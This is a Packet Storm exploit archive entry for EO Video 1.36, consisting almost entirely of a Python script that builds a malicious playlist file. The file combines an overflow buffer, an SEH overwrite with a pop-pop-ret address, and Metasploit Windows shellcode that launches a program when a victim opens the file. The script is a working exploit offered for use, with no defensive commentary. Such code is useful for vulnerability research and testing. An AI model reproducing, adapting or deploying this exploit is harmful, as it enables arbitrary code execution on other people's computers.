EO Video 1.36 SEH Overwrite Exploit

2009-03-09T00:00:00
ID PACKETSTORM:75515
Type packetstorm
Reporter j0rgan
Modified 2009-03-09T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#usage: exploit.py  
print "**************************************************************************"  
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploit\n"  
print "[*] Author: j0rgan"  
print "[*] Seh Exploitation : His0k4"  
print "[*] Tested on: Windows XP SP2 (Fr)\n"  
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"  
print "**************************************************************************"  
  
buff = "\x41" * 1356  
  
next_seh = "\xEB\x06\x41\x41"  
  
seh = "\x14\x1E\x5B\x58" #pop pop ret msgsm32 .acm  
  
header1= (   
"\x3C\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E\x0A\x3C\x50\x6C\x61\x79\x6C"  
"\x69\x73\x74\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73\x74\x3E\x0A\x3C"  
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F"  
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65"  
"\x6E\x63\x79\x3E\x31\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63"  
"\x79\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x46\x6F\x6C\x64\x65"  
"\x72\x3E\x0A\x3C\x4E\x61\x6D\x65\x3E\x6E\x65\x73\x74\x6F\x3C\x2F\x4E\x61\x6D"  
"\x65\x3E\x0A\x3C\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x31"  
"\x3C\x2F\x54\x72\x75\x65\x46\x72\x65\x71\x75\x65\x6E\x63\x79\x3E\x0A\x3C\x2F"  
"\x46\x6F\x6C\x64\x65\x72\x3E\x0A\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x4C\x69\x73"  
"\x74\x3E\x0A\x3C\x50\x72\x6F\x6A\x65\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E"  
"\x0A\x3C\x4E\x61\x6D\x65\x3E")  
  
header2= (  
"\x3C\x2F\x4E\x61\x6D\x65\x3E\x0A\x3C\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E"  
"\x30\x3C\x2F\x53\x74\x61\x72\x74\x54\x69\x6D\x65\x3E\x0A\x3C\x45\x6E\x64\x54"  
"\x69\x6D\x65\x3E\x30\x3C\x2F\x45\x6E\x64\x54\x69\x6D\x65\x3E\x0A\x3C\x4D\x65"  
"\x64\x69\x61\x53\x69\x7A\x65\x3E\x0A\x3C\x57\x69\x64\x74\x68\x3E\x2D\x31\x3C"  
"\x2F\x57\x69\x64\x74\x68\x3E\x0A\x3C\x48\x65\x69\x67\x68\x74\x3E\x2D\x31\x3C"  
"\x2F\x48\x65\x69\x67\x68\x74\x3E\x0A\x3C\x2F\x4D\x65\x64\x69\x61\x53\x69\x7A"  
"\x65\x3E\x0A\x3C\x53\x74\x61\x74\x65\x3E\x33\x30\x32\x31\x36\x3C\x2F\x53\x74"  
"\x61\x74\x65\x3E\x0A\x3C\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73\x69\x74\x69\x6F"  
"\x6E\x49\x6E\x64\x65\x78\x3E\x30\x3C\x2F\x46\x6F\x6C\x64\x65\x72\x50\x6F\x73"  
"\x69\x74\x69\x6F\x6E\x49\x6E\x64\x65\x78\x3E\x0A\x3C\x2F\x50\x72\x6F\x6A\x65"  
"\x63\x74\x45\x6C\x65\x6D\x65\x6E\x74\x3E\x0A\x3C\x2F\x50\x6C\x61\x79\x6C\x69"  
"\x73\x74\x3E\x5C\x6E\x3C\x2F\x45\x4F\x50\x6C\x61\x79\x6C\x69\x73\x74\x3E")  
  
  
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com  
shellcode = (  
"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x35"  
"\x9c\xf7\xbc\x83\xeb\xfc\xe2\xf4\xc9\x74\xb3\xbc\x35\x9c\x7c\xf9"  
"\x09\x17\x8b\xb9\x4d\x9d\x18\x37\x7a\x84\x7c\xe3\x15\x9d\x1c\xf5"  
"\xbe\xa8\x7c\xbd\xdb\xad\x37\x25\x99\x18\x37\xc8\x32\x5d\x3d\xb1"  
"\x34\x5e\x1c\x48\x0e\xc8\xd3\xb8\x40\x79\x7c\xe3\x11\x9d\x1c\xda"  
"\xbe\x90\xbc\x37\x6a\x80\xf6\x57\xbe\x80\x7c\xbd\xde\x15\xab\x98"  
"\x31\x5f\xc6\x7c\x51\x17\xb7\x8c\xb0\x5c\x8f\xb0\xbe\xdc\xfb\x37"  
"\x45\x80\x5a\x37\x5d\x94\x1c\xb5\xbe\x1c\x47\xbc\x35\x9c\x7c\xd4"  
"\x09\xc3\xc6\x4a\x55\xca\x7e\x44\xb6\x5c\x8c\xec\x5d\x6c\x7d\xb8"  
"\x6a\xf4\x6f\x42\xbf\x92\xa0\x43\xd2\xff\x96\xd0\x56\x9c\xf7\xbc"  
)  
  
exploit = header1 + buff + next_seh + seh + shellcode + header2  
  
try:  
out_file = open("exploit.eop",'w')  
out_file.write(exploit)  
out_file.close()  
print "Exploit File Created!\nNow Open it :)"  
except:  
print "Error"  
  
  
`